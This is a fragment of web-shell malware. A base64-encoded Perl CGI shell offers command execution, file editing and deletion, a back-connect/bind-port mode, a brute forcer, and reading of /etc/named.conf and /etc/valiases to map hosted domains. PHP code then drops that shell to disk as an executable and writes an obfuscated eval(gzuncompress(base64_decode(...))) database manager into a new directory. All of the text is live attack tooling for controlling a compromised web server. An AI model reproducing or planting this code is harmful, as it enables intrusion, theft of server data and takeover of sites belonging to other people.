xhc3M9JyRzdHlsZSc+DQoNCgkJCTx0ZCBpZD0nRmlsZV8kaScgc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsgZm9udC13ZWlnaHQ6IGJvbGQ7Jz48YSAgaHJlZj0nP2E9Z3VpJmQ9Ii4kZC4iJz5bICIuJGRpcm5hbWUuIiBdPC9hPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZD5ESVI8L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZU93bmVyKCRkKS4iPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGQpLiInLCciLiRkaXJuYW1lLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgiLiRpLiIsJyIuJGRpcm5hbWUuIicpXCIgPiIuJkZpbGVQZXJtcygkZCkuIjwvc3Bhbj48L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZCkuIjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz48YSBocmVmPSdqYXZhc2NyaXB0OnJldHVybiBmYWxzZTsnIG9uY2xpY2s9XCJyZW5hbWVfZm9ybSgkaSwnJGRpcm5hbWUnLCciLiZBZGRTbGFzaGVzKCZBZGRTbGFzaGVzKCRkKSkuIicpXCI+UmVuYW1lPC9hPiAgfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBkaXI6ICRkaXJuYW1lID8nKSkgeyByZXR1cm4gZmFsc2U7fVwiIGhyZWY9Jz9hPWd1aSZkPSRwYXRoJnJlbW92ZT0kZGlybmFtZSc+UmVtb3ZlPC9hPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsNCgkJCSRpKys7DQoJCX0NCgkJZm9yZWFjaCBteSAkZiAoQGZuYW1lKQ0KCQl7DQoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOw0KCQkJJGZpbGU9JGY7DQoJCQkkZiA9ICRwYXRoLiRmOw0KCQkJJHZpZXcgPSAiP2Rpcj0iLiRwYXRoLiImdmlldz0iLiRmOw0KCQkJJHJlc3VsdCAuPSAiPHRyIGNsYXNzPSckc3R5bGUnPjx0ZCBpZD0nRmlsZV8kaScgc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiRwYXRoLiImYz1lZGl0JTIwIi4kZmlsZS4iJz4iLiRmaWxlLiI8L2E+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPiIuJlBhcnNlRmlsZVNpemUoJkZpbGVTaXplKCRmKSkuIjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz4iLiZGaWxlT3duZXIoJGYpLiI8L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgaWQ9J0ZpbGVQZXJtc18kaScgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOycgb25kYmxjbGljaz1cInJtX2NobW9kX2Zvcm0odGhpcywiLiRpLiIsJyIuJkZpbGVQZXJtcygkZikuIicsJyIuJGZpbGUuIicpXCIgPjxzcGFuIG9uY2xpY2s9XCJjaG1vZF9mb3JtKCRpLCckZmlsZScpXCIgPiIuJkZpbGVQZXJtcygkZikuIjwvc3Bhbj48L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZikuIjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4kcGF0aC4iJmM9ZWRpdCUyMCIuJGZpbGUuIic+RWRpdDwvYT4gfCA8YSBocmVmPSdqYXZhc2NyaXB0OnJldHVybiBmYWxzZTsnIG9uY2xpY2s9XCJyZW5hbWVfZm9ybSgkaSwnJGZpbGUnLCdmJylcIj5SZW5hbWU8L2E+IHwgPGEgaHJlZj0nP2E9ZG93bmxvYWQmbz1nbyZmPSIuJGYuIic+RG93bmxvYWQ8L2E+IHwgPGEgb25jbGljaz1cImlmKCFjb25maXJtKCdSZW1vdmUgZmlsZTogJGZpbGUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9JHBhdGgmcmVtb3ZlPSRmaWxlJz5SZW1vdmU8L2E+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPC90cj4iOw0KCQkJJGkrKzsNCgkJfQ0KCQkkcmVzdWx0IC49ICI8L3RhYmxlPjwvZGl2PiI7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUcnkgdG8gVmlldyBMaXN0IFVzZXINCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBWaWV3RG9tYWluVXNlcg0Kew0KCW9wZW4gKGRvbWFpbnMsICcvZXRjL25hbWVkLmNvbmYnKSBvciAkZXJyPTE7DQoJbXkgQGNuenMgPSA8ZG9tYWlucz47DQoJY2xvc2UgZDBtYWluczsNCglteSAkc3R5bGU9ImxpbmUiOw0KCW15ICRyZXN1bHQ9IjxoNT48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+SG9hbmcgU2EgLSBUcnVvbmcgU2E8L2ZvbnQ+PC9oNT4iOw0KCWlmICgkZXJyKQ0KCXsNCgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7DQoJCXJldHVybiAkcmVzdWx0Ow0KCX1lbHNlDQoJew0KCQkkcmVzdWx0IC49ICc8dGFibGU+PHRyPjx0aD5Eb21haW5zPC90aD4gPHRoPlVzZXI8L3RoPjwvdHI+JzsNCgl9DQoJZm9yZWFjaCBteSAkb25lIChAY256cykNCgl7DQoJCWlmKCRvbmUgPX4gbS8uKj96b25lICIoLio/KSIgey8pDQoJCXsJDQoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOw0KCQkJJGZpbGVuYW1lPSAiL2V0Yy92YWxpYXNlcy8iLiRvbmU7DQoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7DQoJCQkkcmVzdWx0IC49ICc8dHIgY2xhc3M9IiRzdHlsZSIgd2lkdGg9NTAlPjx0ZD4nLiRvbmUuJyA8L3RkPjx0ZD4gJy4kb3duZXIuJzwvdGQ+PC90cj4nOw0KCQl9DQoJfQ0KCSRyZXN1bHQgLj0gJzwvdGFibGU+JzsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVmlldyBMb2cNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBWaWV3TG9nDQp7DQoJaWYoJFdpbk5UKQ0KCXsNCgkJcmV0dXJuICI8aDI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDIwcHQgVmVyZGFuYTtjb2xvcjogI2ZmOTkwMDsnPkRvbid0IHJ1biBvbiBXaW5kb3dzPC9mb250PjwvaDI+IjsNCgl9DQoJbXkgJHJlc3VsdD0iPHRhYmxlPjx0cj48dGg+UGF0aCBMb2c8L3RoPjx0aD5TdWJtaXQ8L3RoPjwvdHI+IjsNCglteSBAcGF0aGxvZz0oDQoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nJywNCgkJCQknL3Zhci9sb2cvaHR0cGQvZXJyb3JfbG9nJywNCgkJCQknL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nJw0KCQkJCSk7DQoJbXkgJGk9MDsNCglteSAkcGVybXM7DQoJbXkgJHNsOw0KCWZvcmVhY2ggbXkgJGxvZyAoQHBhdGhsb2cpDQoJew0KCQlpZigtdyAkbG9nKQ0KCQl7DQoJCQkkcGVybXM9Ik9LIjsNCgkJfWVsc2UNCgkJew0KCQkJY2hvcCgkc2wgPSBgbG4gLXMgJGxvZyBlcnJvcl9sb2dfJGlgKTsNCgkJCWlmKCZ0cmltKCRscykgZXEgIiIpDQoJCQl7DQoJCQkJaWYoLXIgJGxzKQ0KCQkJCXsNCgkJCQkJJHBlcm1zPSJPSyI7DQoJCQkJCSRsb2c9ImVycm9yX2xvZ18iLiRpOw0KCQkJCX0NCgkJCX1lbHNlDQoJCQl7DQoJCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7DQoJCQl9DQoJCX0NCgkJJHJlc3VsdCAuPTw8RU5EOw0KCQk8dHI+DQoNCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPg0KCQkJPHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBvbmtleXVwPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnbG9nXyRpJykudmFsdWU9J2xlc3MgJyArIHRoaXMudmFsdWU7IiB2YWx1ZT0iJGxvZyIgc2l6ZT0nNTAnLz48L3RkPg0KCQkJPHRkPjxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJUcnkiIC8+PC90ZD4NCgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJsb2dfJGkiIG5hbWU9ImMiIHZhbHVlPSJsZXNzICRsb2ciLz4NCgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJjb21tYW5kIiAvPg0KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIiAvPg0KCQkJPC9mb3JtPg0KCQkJPHRkPiRwZXJtczwvdGQ+DQoNCgkJPC90cj4NCkVORA0KCQkkaSsrOw0KCX0NCgkkcmVzdWx0IC49IjwvdGFibGU+IjsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQomUmVhZFBhcnNlOw0KJkdldENvb2tpZXM7DQoNCiRTY3JpcHRMb2NhdGlvbiA9ICRFTlZ7J1NDUklQVF9OQU1FJ307DQokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307DQokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9Ow0KJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsNCiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsNCiRPcHRpb25zID0gJGlueydvJ307DQokQWN0aW9uID0gJGlueydhJ307DQoNCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29tbWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAmdHJpbSgkaW57J2QnfSk7DQojIG1hYyBkaW5oIHh1YXQgdGhvbmcgdGluIG5ldSBrbyBjbyBsZW5oIG5hbyENCiRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIiBpZigkUnVuQ29tbWFuZCBlcSAiIik7DQpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pIAkJIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJmb3JtTG9naW47DQp9ZWxzaWYoJEFjdGlvbiBlcSAiZ3VpIikgIyBHVUkgZGlyZWN0b3J5DQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglpZighJFdpbk5UKQ0KCXsNCgkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOw0KCQlpZighKCRjaG1vZCBlcSAwKSkNCgkJew0KCQkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOw0KCQkJJGZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgkJCWNob3AoJHJlc3VsdD0gYGNobW9kICRjaG1vZCAiJGZpbGUiYCk7DQoJCQlpZigmdHJpbSgkcmVzdWx0KSBlcSAiIikNCgkJCXsNCgkJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7DQoJCQl9ZWxzZQ0KCQkJew0KCQkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7DQoJCQl9DQoJCX0NCgl9DQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9Ow0KCWlmKCEkcmVuYW1lIGVxICIiKQ0KCXsNCgkJaWYocmVuYW1lKCRUcmFuc2ZlckZpbGUsJHJlbmFtZSkpDQoJCXsNCgkJCXByaW50ICI8cnVuPiBEb25lISA8L3J1bj48YnI+IjsNCgkJfWVsc2UNCgkJew0KCQkJcHJpbnQgIjxydW4+IFNvcnJ5ISBZb3UgZG9udCBoYXZlIHBlcm1pc3Npb25zISA8L3J1bj48YnI+IjsNCgkJfQ0KCX0NCgkkcmVtb3ZlPSRpbnsncmVtb3ZlJ307DQoJaWYoJHJlbW92ZSBuZSAiIikNCgl7DQoJCSRybSA9ICRDdXJyZW50RGlyLiRQYXRoU2VwLiRyZW1vdmU7DQoJCWlmKC1kICRybSkNCgkJew0KCQkJJlJtRGlyKCRybSk7DQoJCX1lbHNlDQoJCXsNCgkJCWlmKHVubGluaygkcm0pKQ0KCQkJew0KCQkJCXByaW50ICI8cnVuPiBEb25lISA8L3J1bj48YnI+IjsNCgkJCX1lbHNlDQoJCQl7DQoJCQkJcHJpbnQgIjxydW4+IFNvcnJ5ISBZb3UgZG9udCBoYXZlIHBlcm1pc3Npb25zISA8L3J1bj48YnI+IjsNCgkJCX0JCQkNCgkJfQ0KCX0NCglwcmludCAmTGlzdERpcjsNCg0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiY29tbWFuZCIpCQkJCSAJIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQNCnsNCgkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJcHJpbnQgJkV4ZWN1dGVDb21tYW5kOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAic2F2ZSIpCQkJCSAJIyB1c2VyIHdhbnRzIHRvIHNhdmUgYSBmaWxlDQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglpZigmU2F2ZUZpbGUoJGlueydkYXRhJ30sJGlueydmaWxlJ30pKQ0KCXsNCgkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOw0KCX1lbHNlDQoJew0KCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOw0KCX0NCglwcmludCAmTGlzdERpcjsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpIAkJCQkJIyB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUNCnsNCgkmUHJpbnRQYWdlSGVhZGVyOw0KDQoJcHJpbnQgJlVwbG9hZEZpbGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJiYWNrYmluZCIpIAkJCQkjIHVzZXIgd2FudHMgdG8gYmFjayBjb25uZWN0IG9yIGJpbmQgcG9ydA0Kew0KCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsNCglwcmludCAmQmFja0JpbmQ7DQp9DQplbHNpZigkQWN0aW9uIGVxICJicnV0ZWZvcmNlciIpIAkJCSMgdXNlciB3YW50cyB0byBicnV0ZSBmb3JjZQ0Kew0KCSZQcmludFBhZ2VIZWFkZXI7DQoJcHJpbnQgJkJydXRlRm9yY2VyOw0KfWVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgCQkJCSMgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUNCnsNCglwcmludCAmRG93bmxvYWRGaWxlOw0KfWVsc2lmKCRBY3Rpb24gZXEgImNoZWNrbG9nIikgCQkJCSMgdXNlciB3YW50cyB0byB2aWV3IGxvZyBmaWxlDQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglwcmludCAmVmlld0xvZzsNCg0KfWVsc2lmKCRBY3Rpb24gZXEgImRvbWFpbnN1c2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbGlzdCB1c2VyL2RvbWFpbg0Kew0KCSZQcmludFBhZ2VIZWFkZXI7DQoJcHJpbnQgJlZpZXdEb21haW5Vc2VyOw0KfWVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpIAkJCQkjIHVzZXIgd2FudHMgdG8gbG9nb3V0DQp7DQoJJlBlcmZvcm1Mb2dvdXQ7DQp9DQomUHJpbnRQYWdlRm9vdGVyOw==';
- $file = fopen("telnet.cok" ,"w+");
- $write = fwrite ($file ,base64_decode($cgi2012));
- fclose($file);
- chmod("telnet.cok",0755);
- echo "<iframe src=telnet/telnet.cok width=96% height=76% frameborder=0></iframe></div>";
- }
- # x=mysql2
- elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql2')) {
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ MYSQL</span> <span class='b8'>MANAGER ]:=O</span></b></nobr><br/><br/> ";
- echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='angel/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
- if (!is_dir('angel')){
- $mk = @mkdir('angel',0777);
- @fwrite($f , $c);
- $f2 =@fopen('angel/db.php','w');
- $sml_db =
- "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM